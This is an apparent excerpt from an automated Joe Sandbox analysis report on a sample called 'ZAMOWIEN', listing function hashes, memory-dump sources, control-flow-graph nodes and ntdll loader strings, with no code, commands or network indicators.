                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 109056ef82ab0848ce0ec7e5b85958cddbc761cbfdd3d7bf3aa36e9de9d4cd37
                                                                                  • Instruction ID: 459c0a864de110915b4b7481505ba00f093b881c53e54c900e2d5eb9d27933f7
                                                                                  • Opcode Fuzzy Hash: 109056ef82ab0848ce0ec7e5b85958cddbc761cbfdd3d7bf3aa36e9de9d4cd37
                                                                                  • Instruction Fuzzy Hash: 2C9002B121100416D5407159450474A000547D0301F52C526E5154954FCA6E8DD97665
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e7031779a7577c5c4cf674975f9d623c18b55a3725544106bd1c4739c604422
                                                                                  • Instruction ID: 4f328cfcd8dae31b84b17179a8138f92752d8eb19fe54f0e0d1da8635e783d02
                                                                                  • Opcode Fuzzy Hash: 4e7031779a7577c5c4cf674975f9d623c18b55a3725544106bd1c4739c604422
                                                                                  • Instruction Fuzzy Hash: 6790026161100516D5017159450471A000A47D0241F92C537E1114955FCE3A8996B131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60a5988f2a4dd447c67d5eec38ce262c53e73a98c732734d12e69eaaca2146d1
                                                                                  • Instruction ID: d4805d55c4c0f17bcd90a01d018d5690ef9083a6328465d1b069a903e7803486
                                                                                  • Opcode Fuzzy Hash: 60a5988f2a4dd447c67d5eec38ce262c53e73a98c732734d12e69eaaca2146d1
                                                                                  • Instruction Fuzzy Hash: 0690026131100017D5407159551870A400597E1301F52D526E0504954DDD2A885A7222
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a04fa0e968c164aadec5507c37421c756f3f2bca388cd6128a3203756107a7c
                                                                                  • Instruction ID: 24ff05fa2c4e8ad88509e2d464192bf00f9015b0fcb6a8cf84ef3557b190f057
                                                                                  • Opcode Fuzzy Hash: 1a04fa0e968c164aadec5507c37421c756f3f2bca388cd6128a3203756107a7c
                                                                                  • Instruction Fuzzy Hash: DB90026922300016D5807159550870E000547D1202F92D92AE0105958DCD2A886D7321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: daa20d9f29f3fe109ca6932a0faa817514aea3a0a5efddd2801a6163911da8e4
                                                                                  • Instruction ID: 479766e18483c2a3d516e6104531463b9e1ed59f0d9825f7b210b4f22c0a54bf
                                                                                  • Opcode Fuzzy Hash: daa20d9f29f3fe109ca6932a0faa817514aea3a0a5efddd2801a6163911da8e4
                                                                                  • Instruction Fuzzy Hash: 6E90026121504456D50065595508B0A000547D0205F52D526E1154995ECA3A8855B131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67c0d9de137c9f8acf9d318ccdc1a0f33252c981aa530f1ff0bfbfd43a2d5089
                                                                                  • Instruction ID: 0b8a36eedbde4d6eaebec918f4474d42e98c50edf12b1e3b945692b37e651d73
                                                                                  • Opcode Fuzzy Hash: 67c0d9de137c9f8acf9d318ccdc1a0f33252c981aa530f1ff0bfbfd43a2d5089
                                                                                  • Instruction Fuzzy Hash: 9190027121100417D5006159560870B000547D0201F52D926E0514958EDA6B88557121
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 846807bd18b96fc785bf670326291e50ee7b5d80a6cf57f9513252a87f5ac826
                                                                                  • Instruction ID: c931ac95b7f55b6aa3d1420eb3da0348567cf01ddb9441e375bba90796b04d87
                                                                                  • Opcode Fuzzy Hash: 846807bd18b96fc785bf670326291e50ee7b5d80a6cf57f9513252a87f5ac826
                                                                                  • Instruction Fuzzy Hash: 08900261252041665945B159450460B400657E0241792C527E1504D50DC93B985AF621
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b82f4fe9406da6cf17147010eb300c3eb1411a986a889a118a70f216ae82468e
                                                                                  • Instruction ID: cd285efacea359d81468603b7605a7b5138156644d4c929bcee5dd81667962ae
                                                                                  • Opcode Fuzzy Hash: b82f4fe9406da6cf17147010eb300c3eb1411a986a889a118a70f216ae82468e
                                                                                  • Instruction Fuzzy Hash: D090027125100416D5417159450470A000957D0241F92C527E0514954FCA6A8A5ABA61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1bccd2c93e27a85ac75d8d01c2c7a2519e5b72581d6eb7b9fc2061043e2e4c95
                                                                                  • Instruction ID: 40c04eafdc423432bc9bdcad332e1de66619d7cb8b7760e6598fff2823b2393f
                                                                                  • Opcode Fuzzy Hash: 1bccd2c93e27a85ac75d8d01c2c7a2519e5b72581d6eb7b9fc2061043e2e4c95
                                                                                  • Instruction Fuzzy Hash: 5E90027121100816D5807159450474E000547D1301F92C52AE0115A54ECE2A8A5D77A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 825ca37ca3d8f3fc4093605c02edcec0dfd98a14ec1557cc5b5978cf3a7d91c3
                                                                                  • Instruction ID: 8856fa72a0ca4caeead2c56cdaef06097199e2b0fca481d1c31c378debccefc4
                                                                                  • Opcode Fuzzy Hash: 825ca37ca3d8f3fc4093605c02edcec0dfd98a14ec1557cc5b5978cf3a7d91c3
                                                                                  • Instruction Fuzzy Hash: 6190027121504856D54071594504B4A001547D0305F52C526E0154A94EDA3A8D59B661
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e509e42313aa19b34d610a1798c7f37513800261ea39961cfa63d12c5bff7e2b
                                                                                  • Instruction ID: 89c9db8bbddb3722a5ac44d77e542a4444a34ee6f99aad452cc5e1a198962a31
                                                                                  • Opcode Fuzzy Hash: e509e42313aa19b34d610a1798c7f37513800261ea39961cfa63d12c5bff7e2b
                                                                                  • Instruction Fuzzy Hash: 2790026161500416D5407159551870A001547D0201F52D526E0114954ECA6E8A5976A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 883ca6e793e1886691f3dbc000c50b9197b40a31ce0c0551e7d4192c4f88a03e
                                                                                  • Instruction ID: d302529bd733c24029a1a17b34d70fdc6ee2776fd77a579a043b9754069c541d
                                                                                  • Opcode Fuzzy Hash: 883ca6e793e1886691f3dbc000c50b9197b40a31ce0c0551e7d4192c4f88a03e
                                                                                  • Instruction Fuzzy Hash: 9290027121100856D50061594504B4A000547E0301F52C52BE0214A54ECA2AC8557521
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd37ba6b458bb6c609c7eb0dd035cdf1276cf6cb95313cbf0f01c5f19d17b950
                                                                                  • Instruction ID: 184b347666962ddd6665a58d7560cf5f2d335e133828dc94db9da3b2026fbcf4
                                                                                  • Opcode Fuzzy Hash: dd37ba6b458bb6c609c7eb0dd035cdf1276cf6cb95313cbf0f01c5f19d17b950
                                                                                  • Instruction Fuzzy Hash: 35900265231000160545A559070460F044557D6351392C52AF1506990DCA3688697321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df59e6057bad8cb94c81d661c2a732472f3f36930fdae557adf8f39792d1963e
                                                                                  • Instruction ID: f0793300be931a5691c0cefdac28d0ae7f02e191b36fc932e1e8a2fb0a877415
                                                                                  • Opcode Fuzzy Hash: df59e6057bad8cb94c81d661c2a732472f3f36930fdae557adf8f39792d1963e
                                                                                  • Instruction Fuzzy Hash: FF90027161500816D5507159451474A000547D0301F52C526E0114A54ECB6A8A5976A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29311b43fd524ad3a2e9b70b373b075f9ec05939dd3edbf4ed4703af4cc3a409
                                                                                  • Instruction ID: 9e2547f29d203043f1f618a7cd60816edb242899c40ba6af0e38601b77348e14
                                                                                  • Opcode Fuzzy Hash: 29311b43fd524ad3a2e9b70b373b075f9ec05939dd3edbf4ed4703af4cc3a409
                                                                                  • Instruction Fuzzy Hash: BF90027121100816D5046159490478A000547D0301F52C526E6114A55FDA7A88957131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c424c2f7bb3e1f065c6e9abbd22c9204fd2aac98d21e47ec9f7d4fd3e97247f4
                                                                                  • Instruction ID: 167723e55570d880831f7f7e59606c635da1c07f5089fb352edd76ee2976331c
                                                                                  • Opcode Fuzzy Hash: c424c2f7bb3e1f065c6e9abbd22c9204fd2aac98d21e47ec9f7d4fd3e97247f4
                                                                                  • Instruction Fuzzy Hash: 9E900265221000170505A559070460B004647D5351352C536F1105950DDA3688657121
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d20d60f3dcf795dd47d967d9e95cece68b4bd5da64bfa2d87c5f33d9d07dc7d9
                                                                                  • Instruction ID: cdb2d9ac3f10d34b8f1bf17a5fa2240e6a836ec9bb03c351c2ee8fee0b76fc04
                                                                                  • Opcode Fuzzy Hash: d20d60f3dcf795dd47d967d9e95cece68b4bd5da64bfa2d87c5f33d9d07dc7d9
                                                                                  • Instruction Fuzzy Hash: 4D9002E1211140A64900A2598504B0E450547E0201B52C52BE1144960DC93A8855B135
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 76dcae8e46affb3a93d508eef37aab3634676c6dd4907d125c3e2282b0bf7e76
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 6 373ddfc9-373ddfd3 7 373de01a-373de1b7 6->7 8 373ddfd5-373de013 6->8 9 373de1b9-373de1c4 7->9 8->7 9->9 10 373de1c6-373de1e1 9->10 11 373de274-373de278 10->11 12 373de1e7-373de200 10->12 14 373de29a-373de29e 11->14 15 373de27a-373de297 11->15 13 373de208-373de26a 12->13 13->13 16 373de26c-373de26d 13->16 17 373de2c1-373de2c5 14->17 18 373de2a0-373de2be 14->18 15->14 16->11 19 373de2c7-373de2df 17->19 20 373de2e2-373de2fb 17->20 18->17 19->20
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3754132690
                                                                                  • Opcode ID: f995138655b78f498d89d2ffc2d3d765cfe90b2b5d5e64d29202eccb2ef66a67
                                                                                  • Instruction ID: cf1a3283078f07342173a5adea9dc5b7b42b775363499a491c76f7a02202db0b
                                                                                  • Opcode Fuzzy Hash: f995138655b78f498d89d2ffc2d3d765cfe90b2b5d5e64d29202eccb2ef66a67
                                                                                  • Instruction Fuzzy Hash: C39130F04482988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1341 377aa1f0-377aa269 call 376e2330 * 2 RtlDebugPrintTimes 1347 377aa41f-377aa444 call 376e24d0 * 2 call 37714b50 1341->1347 1348 377aa26f-377aa27a 1341->1348 1350 377aa27c-377aa289 1348->1350 1351 377aa2a4 1348->1351 1354 377aa28b-377aa28d 1350->1354 1355 377aa28f-377aa295 1350->1355 1352 377aa2a8-377aa2b4 1351->1352 1356 377aa2c1-377aa2c3 1352->1356 1354->1355 1358 377aa29b-377aa2a2 1355->1358 1359 377aa373-377aa375 1355->1359 1360 377aa2b6-377aa2bc 1356->1360 1361 377aa2c5-377aa2c7 1356->1361 1358->1352 1362 377aa39f-377aa3a1 1359->1362 1365 377aa2be 1360->1365 1366 377aa2cc-377aa2d0 1360->1366 1361->1362 1367 377aa3a7-377aa3b4 1362->1367 1368 377aa2d5-377aa2fd RtlDebugPrintTimes 1362->1368 1365->1356 1370 377aa3ec-377aa3ee 1366->1370 1371 377aa3da-377aa3e6 1367->1371 1372 377aa3b6-377aa3c3 1367->1372 1368->1347 1379 377aa303-377aa320 RtlDebugPrintTimes 1368->1379 1370->1362 1373 377aa3fb-377aa3fd 1371->1373 1375 377aa3cb-377aa3d1 1372->1375 1376 377aa3c5-377aa3c9 1372->1376 1377 377aa3ff-377aa401 1373->1377 1378 377aa3f0-377aa3f6 1373->1378 1380 377aa4eb-377aa4ed 1375->1380 1381 377aa3d7 1375->1381 1376->1375 1382 377aa403-377aa409 1377->1382 1383 377aa3f8 1378->1383 1384 377aa447-377aa44b 1378->1384 1379->1347 1389 377aa326-377aa34c RtlDebugPrintTimes 1379->1389 1380->1382 1381->1371 1386 377aa40b-377aa41d RtlDebugPrintTimes 1382->1386 1387 377aa450-377aa474 RtlDebugPrintTimes 1382->1387 1383->1373 1385 377aa51f-377aa521 1384->1385 1386->1347 1387->1347 1392 377aa476-377aa493 RtlDebugPrintTimes 1387->1392 1389->1347 1394 377aa352-377aa354 1389->1394 1392->1347 1401 377aa495-377aa4c4 RtlDebugPrintTimes 1392->1401 1395 377aa356-377aa363 1394->1395 1396 377aa377-377aa38a 1394->1396 1398 377aa36b-377aa371 1395->1398 1399 377aa365-377aa369 1395->1399 1400 377aa397-377aa399 1396->1400 1398->1359 1398->1396 1399->1398 1402 377aa39b-377aa39d 1400->1402 1403 377aa38c-377aa392 1400->1403 1401->1347 1407 377aa4ca-377aa4cc 1401->1407 1402->1362 1404 377aa3e8-377aa3ea 1403->1404 1405 377aa394 1403->1405 1404->1370 1405->1400 1408 377aa4ce-377aa4db 1407->1408 1409 377aa4f2-377aa505 1407->1409 1411 377aa4dd-377aa4e1 1408->1411 1412 377aa4e3-377aa4e9 1408->1412 1410 377aa512-377aa514 1409->1410 1413 377aa516 1410->1413 1414 377aa507-377aa50d 1410->1414 1411->1412 1412->1380 1412->1409 1413->1377 1415 377aa51b-377aa51d 1414->1415 1416 377aa50f 1414->1416 1415->1385 1416->1410
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: HEAP:
                                                                                  • API String ID: 3446177414-2466845122
                                                                                  • Opcode ID: 45198c43d553bb68eae7be02ecb069ca15eafb43880563de293f0c936e877d24
                                                                                  • Instruction ID: 80d893702a612ceaa002b8b001e7da990bab0f8dfeb67aed6bb09650db716711
                                                                                  • Opcode Fuzzy Hash: 45198c43d553bb68eae7be02ecb069ca15eafb43880563de293f0c936e877d24
                                                                                  • Instruction Fuzzy Hash: 3CA18C75A043528FEB84CE18C894A2AB7E6FF88350F164A2DF945DB350EB70EC45CB91
                                                                                  Strings
                                                                                  • ExecuteOptions, xrefs: 377444AB
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37744507
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37744460
                                                                                  • Execute=1, xrefs: 3774451E
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37744530
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 37744592
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3774454D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 7c5dfdf6daee7863eafebcdf3d50a0c805a3a4160ad27e2f5d023dbd069a4c2a
                                                                                  • Instruction ID: d66bba7fa7f8a0386fa293f34ffe44145b1fe5ad8e38f15251796375ad2d4753
                                                                                  • Opcode Fuzzy Hash: 7c5dfdf6daee7863eafebcdf3d50a0c805a3a4160ad27e2f5d023dbd069a4c2a
                                                                                  • Instruction Fuzzy Hash: 0B510675A002197AEF149F94DC99FED73E9AF08364F4004ADE505AF180EB74AA45CFA2
                                                                                  Strings
                                                                                  • Actx , xrefs: 37737819, 37737880
                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 377377E2
                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 377377DD, 37737802
                                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 377378F3
                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37737807
                                                                                  • SsHd, xrefs: 376EA304
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                  • API String ID: 0-1988757188
                                                                                  • Opcode ID: 341e94519af910add2cb748c402241cee15f7b4e630c5be5308945e922b0bad9
                                                                                  • Instruction ID: 83c40f06bf159d48dd5296a9d735c692d6372d16bf05f58875062bb6ab4da263
                                                                                  • Opcode Fuzzy Hash: 341e94519af910add2cb748c402241cee15f7b4e630c5be5308945e922b0bad9
                                                                                  • Instruction Fuzzy Hash: 02E1E6746063018FE711CE24CEE077A77E9BB84364F504A2DF855DBA91DB31E849CBA2
                                                                                  APIs
